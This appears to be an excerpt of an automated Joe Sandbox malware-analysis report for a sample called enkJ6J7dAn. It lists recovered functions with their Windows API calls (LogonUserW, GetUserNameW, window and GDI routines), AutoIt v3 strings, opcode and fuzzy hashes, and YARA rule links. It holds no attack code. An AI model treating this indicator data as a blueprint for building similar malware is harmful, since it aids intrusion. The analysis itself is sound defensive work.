                                                                                                                    • API String ID: 3456056419-0
                                                                                                                    • Opcode ID: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                                                                                    • Instruction ID: ec784d9e1adcb2c5bdb0852901797f150ca91aa996cd98963819779bf85d9a24
                                                                                                                    • Opcode Fuzzy Hash: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                                                                                    • Instruction Fuzzy Hash: D8E0DF352002029FC300EF66C84495AB7E8EF94368F10883EFD45D7341EA74E80087A6
                                                                                                                    Function 00436CD7 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LogonUser
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1244722697-0
                                                                                                                    • Opcode ID: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                                                                                    • Instruction ID: 7208d1371e48addad7a82bf776aec5a394cd9d1c10cc53d221989696c058f8f6
                                                                                                                    • Opcode Fuzzy Hash: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                                                                                    • Instruction Fuzzy Hash: 4DE0ECB626460EAFDB04CF68DC42EBF37ADA749710F004618BA16D7280C670E911CA74
                                                                                                                    Function 00472C3F Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: NameUser
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2645101109-0
                                                                                                                    • Opcode ID: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                                                                                    • Instruction ID: cbdb53fe1e94bfc77c89611ca4b62432a5518fa0aa6a76fb1323f8d63e00c007
                                                                                                                    • Opcode Fuzzy Hash: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                                                                                    • Instruction Fuzzy Hash: C3C04CB5004008EBDB148F50D9889D93B78BB04340F108199B60E95040D7B496C9DBA5
                                                                                                                    Function 0041F250 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3192549508-0
                                                                                                                    • Opcode ID: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                                                                                    • Instruction ID: fb0c5f5a3ae0de1c345b26270a1521b23addb5e119a177cdcf8b78f668196b28
                                                                                                                    • Opcode Fuzzy Hash: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                                                                                    • Instruction Fuzzy Hash: 8190027625150157470417705E1964925905B5960275108BA6D11C8564DAA98089A619
                                                                                                                    Function 0042200C Relevance: 1.4, Strings: 1, Instructions: 180COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: N@
                                                                                                                    • API String ID: 0-1509896676
                                                                                                                    • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                                                                    • Instruction ID: 433aa61276291b0397d7e0efaabfbd78b7095b9e612e68cb1662ee3b8c9c8781
                                                                                                                    • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                                                                    • Instruction Fuzzy Hash: 48618E71A003259FCB18CF48D584AAEBBF2FF84310F5AC1AED9095B361C7B59955CB88
                                                                                                                    Function 0040FA10 Relevance: .6, Instructions: 607COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                                                                                    • Instruction ID: 421b1f2eadcb2952f8febc08502f38db6b120a980ad90a3a21cdce547adf9c29
                                                                                                                    • Opcode Fuzzy Hash: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                                                                                    • Instruction Fuzzy Hash: 132270B7E5151A9BDB08CE95CC415D9B3A3BBC832471F9129D819E7305EE78BA078BC0
                                                                                                                    Function 004129D0 Relevance: .4, Instructions: 355COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                                                                    • Instruction ID: 2bcfc4213c201322ab01e918109ed7ba488288358e1fe6702c600853dbf8b640
                                                                                                                    • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                                                                    • Instruction Fuzzy Hash: 9CC1B473D0E6B3058B35466D45182BFFE626E91B8031FC392DDD03F399C22AADA196D4
                                                                                                                    Function 004125E8 Relevance: .3, Instructions: 349COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                                                                    • Instruction ID: 7014f9c6c4bb04029b5f83a2624c32223adacf072d8c068e18a9ecb8bc3ae66d
                                                                                                                    • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                                                                    • Instruction Fuzzy Hash: 04C1A473D1A6B2058B36476D05182BFFE626E91B8031FC3D6CCD03F299C22AAD9596D4
                                                                                                                    Function 00412216 Relevance: .3, Instructions: 332COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                                                                    • Instruction ID: 878ae001d8650add2b069b622ec184fb54f95ec25c04ba16196e518284591b6f
                                                                                                                    • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                                                                    • Instruction Fuzzy Hash: FBC19473D0A6B2068B36476D05582BFFE626E91B8131FC3D2CCD03F299C22AAD9595D4
                                                                                                                    Function 0420A648 Relevance: .1, Instructions: 92COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2145500065.0000000004207000.00000040.00000020.00020000.00000000.sdmp, Offset: 04207000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_4207000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                                                    • Instruction ID: 9956b8ead60c746f4d185347b419096a9fc1ff656525fac9ff4b5bae9f71829b
                                                                                                                    • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                                                    • Instruction Fuzzy Hash: 4C41D571D1051CDBCF48CFADC991AEEBBF1AF88201F548299D516AB345D730AB41DB40
                                                                                                                    Function 0420A538 Relevance: .0, Instructions: 35COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2145500065.0000000004207000.00000040.00000020.00020000.00000000.sdmp, Offset: 04207000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_4207000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                                                    • Instruction ID: e012074f8602b1a7080d2fd5849b02cbafd5bfb9fd1000267a6c5200d3a897f4
                                                                                                                    • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                                                    • Instruction Fuzzy Hash: 0C018C78E10209EFCB44DF98C5909AEFBF5FB48250F608699E809A7341E730EE41DB80
                                                                                                                    Function 0420A4D8 Relevance: .0, Instructions: 35COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2145500065.0000000004207000.00000040.00000020.00020000.00000000.sdmp, Offset: 04207000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_4207000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                                                    • Instruction ID: 210ddec57d69896d12179301e1920c9032f5b8e36c74c7b40363780feba995f6
                                                                                                                    • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                                                    • Instruction Fuzzy Hash: CB017E79A10209EFCB44DF98C5909AEFBF5FB58210F608599D809A7341D730EE41DB80
                                                                                                                    Function 04208E88 Relevance: .0, Instructions: 6COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2145500065.0000000004207000.00000040.00000020.00020000.00000000.sdmp, Offset: 04207000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_4207000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                                                    • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                                                                    • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                                                    • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                                                                    Function 004594E9 Relevance: 79.2, APIs: 41, Strings: 4, Instructions: 490filewindowcomCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • DeleteObject.GDI32(?), ref: 0045953B
                                                                                                                    • DeleteObject.GDI32(?), ref: 00459551
                                                                                                                    • DestroyWindow.USER32(?), ref: 00459563
                                                                                                                    • GetDesktopWindow.USER32 ref: 00459581
                                                                                                                    • GetWindowRect.USER32(00000000), ref: 00459588
                                                                                                                    • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                                                                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                                                                                                                    • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 004596F8
                                                                                                                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                                                                                                                    • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                                                                                                                    • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 0045978F
                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004597AC
                                                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                                                                                                                    • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 004597E2
                                                                                                                    • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                                                                                                                    • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                                                                                                                    • ShowWindow.USER32(?,00000004), ref: 00459865
                                                                                                                    • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                                                                                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                                                                                                                    • GetStockObject.GDI32(00000011), ref: 004598CD
                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                                                                                                                    • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                                                                                                                    • DeleteDC.GDI32(00000000), ref: 004598F8
                                                                                                                    • _wcslen.LIBCMT ref: 00459916
                                                                                                                    • _wcscpy.LIBCMT ref: 0045993A
                                                                                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                                                                                                                    • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                                                                                                                    • GetDC.USER32(00000000), ref: 004599FC
                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 00459A0C
                                                                                                                    • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                                                                                                                    • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                                                                                                                    • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                                                                                                    • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                    • API String ID: 4040870279-2373415609
                                                                                                                    • Opcode ID: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                                                                                    • Instruction ID: 0470743097681e939cd033c9659fc80dd101af82a4c7fdd8c03ae3a829a790b9
                                                                                                                    • Opcode Fuzzy Hash: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                                                                                    • Instruction Fuzzy Hash: 92027D71600204EFDB14DF64CD89FAE7BB9BB48305F108569FA05AB292D7B4ED05CB68
                                                                                                                    Function 004417BF Relevance: 49.8, APIs: 33, Instructions: 275COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetSysColor.USER32(00000012), ref: 0044181E
                                                                                                                    • SetTextColor.GDI32(?,?), ref: 00441826
                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                                                                                                                    • GetSysColor.USER32(0000000F), ref: 00441849
                                                                                                                    • SetBkColor.GDI32(?,?), ref: 00441864
                                                                                                                    • SelectObject.GDI32(?,?), ref: 00441874
                                                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                                                                                                                    • GetSysColor.USER32(00000010), ref: 004418B2
                                                                                                                    • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                                                                                                                    • FrameRect.USER32(?,?,00000000), ref: 004418CA
                                                                                                                    • DeleteObject.GDI32(?), ref: 004418D5
                                                                                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                                                                                                                    • FillRect.USER32(?,?,?), ref: 00441970
                                                                                                                      • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                                                                                                                      • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                                                                      • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                                                                      • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                                                                                                                      • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                                                                                                                      • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                                                                      • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                                                                      • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                                                                                                                      • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                                                                                                                      • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                                                                      • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                                                                      • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                                                                      • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 69173610-0
